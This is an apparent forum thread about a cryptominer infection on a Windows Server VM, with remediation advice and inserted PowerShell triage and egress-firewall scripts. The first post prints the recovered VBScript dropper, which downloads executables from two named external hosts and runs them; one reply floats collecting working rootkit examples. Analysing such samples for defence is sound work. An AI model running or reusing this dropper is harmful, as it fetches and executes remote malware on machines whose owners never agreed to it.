jermzz Posted May 4, 2016

It all started yesterday when she realized her VM, which is a Windows Server 2012 R2 machine her friend hosts for her (Hyper-V), was running at max load. The only real thing she hosts on it is her personal website that she sells some stuff on for fun. Anyway, upon further inspection, she saw a suspicious process taking up tons of CPU. Looked like a legit Microsoft service except it was in a tmp directory. So obviously a virus. But why? So looking deeper, a script was found in c:\ a vbs script (insert garbage here).vbs here's what was in it.

```vbscript
' Dropper found in C:\ (as posted). Each half downloads an executable over plain HTTP
' and runs it from the current directory; the second one is named to look like svchost.exe.
Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET", "http://www.game918.me:2545/host.exe", 0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3                      ' read/write
aGet.Type = 1                      ' binary
aGet.Open()
aGet.Write(Post.responseBody)
afile = "host.exe"
aGet.SaveToFile afile, 2           ' 2 = overwrite if present
Shell.Run (afile)

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET", "http://huya1219.top/svchost.exe", 0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
afile = "svchost.exe"
aGet.SaveToFile afile, 2
Shell.Run (afile)
```

It appears it was downloading executables that were scripts and then copying them to run? Not sure what the point of that would be unless they want to be able to update the script via the web. Anyway, it turns out it scheduled a task to run hourly to run itself again. A bitcoin mining service. This little bastard spidered everywhere. My question is HOW did this asshat get in? We ran netstat and found a bunch more stuff. A bunch of modified (or maybe added?) DLL files in the MySQL server plugins folder. I'm assuming it was some MySQL vulnerability for arbitrary file upload? I'll post a couple pictures of the files infected. We searched for files modified on the infection date (5/1). We ended up wiping the VM and starting another.

No telling what else was infected, or maybe a keylogger.... Crap this sucks. We really just want to know what needs to be patched. Hopefully someone can add some insight.

http://imageshack.com/a/img924/108/gsFTxn.jpg
http://imageshack.com/a/img921/2816/WCHbBN.png
http://imageshack.com/a/img924/1098/2TjwUx.png
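As an added triage example (not code from the thread), the following PowerShell hunts for exactly the artifacts described in the post on a Windows Server 2012 R2 host: scheduled tasks that launch a script host or a .vbs, processes running out of a temp directory, scripts dropped in the root of C:\, and files written on the infection date under the MySQL plugin directory. The MySQL path is an assumed default and must be adjusted to the actual install; the date is 5/1/2016 as stated in the post.

```powershell
# Added triage script (not from the thread). Run as Administrator on the affected host.
# The MySQL plugin directory is an assumed default; pass the real one with -MySqlPluginDir.
param(
    [datetime]$InfectionDate  = (Get-Date '2016-05-01'),   # "5/1" from the post
    [string]  $MySqlPluginDir = 'C:\Program Files\MySQL\MySQL Server 5.6\lib\plugin'
)

Write-Host '== Scheduled tasks that launch a script host, a .vbs, or anything from a temp dir =='
Get-ScheduledTask | ForEach-Object {
    $task = $_
    foreach ($a in $task.Actions) {
        $cmd = "$($a.Execute) $($a.Arguments)"
        if ($cmd -match '(?i)wscript|cscript|\.vbs|\\temp\\|\\tmp\\') {
            [pscustomobject]@{ Task = $task.TaskPath + $task.TaskName; State = $task.State; Command = $cmd }
        }
    }
} | Format-Table -AutoSize -Wrap

Write-Host '== Running processes whose image lives under a temp directory =='
Get-CimInstance Win32_Process |
    Where-Object { $_.ExecutablePath -match '(?i)\\(temp|tmp)\\' } |
    Select-Object ProcessId, ParentProcessId, Name, ExecutablePath, CommandLine |
    Format-Table -AutoSize -Wrap

Write-Host '== Scripts sitting in the root of C:\ =='
Get-ChildItem -Path 'C:\*' -Include *.vbs,*.js,*.wsf,*.bat,*.ps1 -File -ErrorAction SilentlyContinue |
    Select-Object FullName, LastWriteTime, Length | Format-Table -AutoSize

Write-Host "== Files written on $($InfectionDate.ToShortDateString()) under the MySQL plugin dir =="
$start = $InfectionDate.Date
$end   = $start.AddDays(1)
Get-ChildItem -Path $MySqlPluginDir -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.LastWriteTime -ge $start -and $_.LastWriteTime -lt $end } |
    ForEach-Object {
        # Hash each candidate so it can be checked against known-good plugin builds later.
        [pscustomobject]@{
            File    = $_.FullName
            Written = $_.LastWriteTime
            SHA256  = (Get-FileHash -LiteralPath $_.FullName -Algorithm SHA256).Hash
        }
    } | Format-Table -AutoSize -Wrap
```

Run it against a snapshot or an offline copy rather than the live box when possible, since the attacker's scheduled task will keep re-fetching the payload while the host is up.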
cooper Posted May 4, 2016

I'd say be glad it was just a spot of bitcoin mining. Since the site was used for selling stuff, it could've been considerably worse. Starting with a new VM set up from scratch is the correct approach. Instead of wiping it might've made more sense to quarantine and pluck apart in a controlled environment at your leisure. How they got in is a great question, and I'd say it depends on a lot of logging to work that one out. Just yesterday an RCE vuln was found in ImageMagick... One thing you could do (and I'm not a Windows person, so don't ask me how to do this) is to make an inventory of external websites this VM has a legitimate purpose of accessing and restricting outbound connections to only those services on those servers. I mean, I trust your GF wasn't using this VM as a place from where to do email and other browsing stuff so there really isn't any valid reason for the VM to initiate an outbound connection to anything but those whitelisted server/port combos. Trigger an alert (which actually ends up with you in a timely fashion) when such attempts somehow do occur. Maybe incorporate a few more sanity checks like that max load thing. Have an automated alert of such situations so you'll be notified promptly when the excrement touches the propeller. Go over all the parts and make sure there isn't maybe a newer version of anything. Can't really get into specifics without you doing so first, but I think you'll manage this just fine. Yeah, this sucks, but it's kinda the cost of doing business/having something on the internet. As I said, it could've been worse and it sounds like you're nicely managing the situation.
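The outbound allowlist and alerting cooper suggests, as an added example using the built-in Windows Firewall (this is not from the thread or from cooper). The remote addresses and ports are placeholders for whatever the shop actually needs to reach; the firewall log path is the Windows default.

```powershell
# Added example (not from the thread): default-deny outbound with an explicit allowlist,
# plus a quick view of what the host tried to reach and was blocked from.
# Remote addresses/ports are placeholders (TEST-NET-3 range); replace with the real services.
$Allowed = @(
    @{ Name = 'Payment API'; Remote = '203.0.113.10'; Port = 443 },
    @{ Name = 'SMTP relay';  Remote = '203.0.113.25'; Port = 587 }
)
$LogPath = 'C:\Windows\System32\LogFiles\Firewall\pfirewall.log'

# Allow rules go in first so the default-deny below cannot cut the site off mid-change.
foreach ($svc in $Allowed) {
    New-NetFirewallRule -DisplayName "Egress allow: $($svc.Name)" -Direction Outbound `
        -Action Allow -Protocol TCP -RemoteAddress $svc.Remote -RemotePort $svc.Port `
        -Profile Any -ErrorAction Stop | Out-Null
}

# Name resolution must keep working; take the resolvers the adapters are already configured with.
$dns = Get-DnsClientServerAddress -AddressFamily IPv4 |
    Select-Object -ExpandProperty ServerAddresses | Sort-Object -Unique
New-NetFirewallRule -DisplayName 'Egress allow: DNS' -Direction Outbound -Action Allow `
    -Protocol UDP -RemoteAddress $dns -RemotePort 53 -Profile Any | Out-Null
# Note: Windows Update / WSUS needs its own allow rule; it is deliberately not guessed here.

# Flip every profile to deny outbound by default and log the drops.
Set-NetFirewallProfile -Profile Domain,Private,Public -DefaultOutboundAction Block `
    -LogBlocked True -LogFileName $LogPath -LogMaxSizeKilobytes 16384

# Alerting side: the log's columns are
# date time action protocol src-ip dst-ip src-port dst-port size ... path(SEND|RECEIVE).
# Returning outbound DROP lines as objects lets a scheduled job mail or event-log them.
function Get-BlockedEgress {
    param([string]$Path = $LogPath, [int]$Last = 20)
    Get-Content -Path $Path -ErrorAction Stop |
        Where-Object { $_ -match '^\S+ \S+ DROP .* SEND$' } |
        ForEach-Object {
            $f = $_ -split ' '
            [pscustomobject]@{ Time = "$($f[0]) $($f[1])"; Proto = $f[3]; Dst = $f[5]; DstPort = $f[7] }
        } | Select-Object -Last $Last
}
Get-BlockedEgress | Format-Table -AutoSize
```

A dropper like the one in the first post would show up here as repeated DROP ... SEND entries to ports 80 and 2545 on hosts that are not in the allowlist, which is the signal to alert on.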
i8igmac Posted May 4, 2016

As cooper said, create a new VM and install... But this rootkit stuff is a lot of fun trying to sort out. It's been years since I have played around. Find all the registry entries related to all scripts and executables.. HKLM /currentversion/run type stuff... There have been few rootkits that had me defeated... Just experienced one the other night to fix a friend's Alienware machine. I just ran out of time and set him up for a reinstall... Could be a fun topic and conversation. "How to make an unremovable rootkit." Everyone can post all their working examples. "Post all the possible registry entries where a rootkit might hide..."
kerravon Posted May 4, 2016

What VM software are you using? There are some well documented exploits out there for getting into VMs; you might need to patch your hypervisor with updates and such. If you just build a new VM and run it as is you are still open to the same attack. So I would look at patching the system first and maybe set up regular snapshots. But that's just my opinion, take it for what it is. I run several ESX farms and have done for years without problem.

Regards,
kerravon
jermzz (Author) Posted May 4, 2016 (edited)

The VM has indeed been recreated. I'll have to ask her what VM she uses. I found this, seems to be what she may have had: http://m.theinquirer.net/inquirer/news/2109599/worlds-dangerous-botnet-mines-bitcoins

Edit: so she was running an old version of WordPress and MySQL. She was asking for it. Now she knows.

Edited May 4, 2016 by jermzz